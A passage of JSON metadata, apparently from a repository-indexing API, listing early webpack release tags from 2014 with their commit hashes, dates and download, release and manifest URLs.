bpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.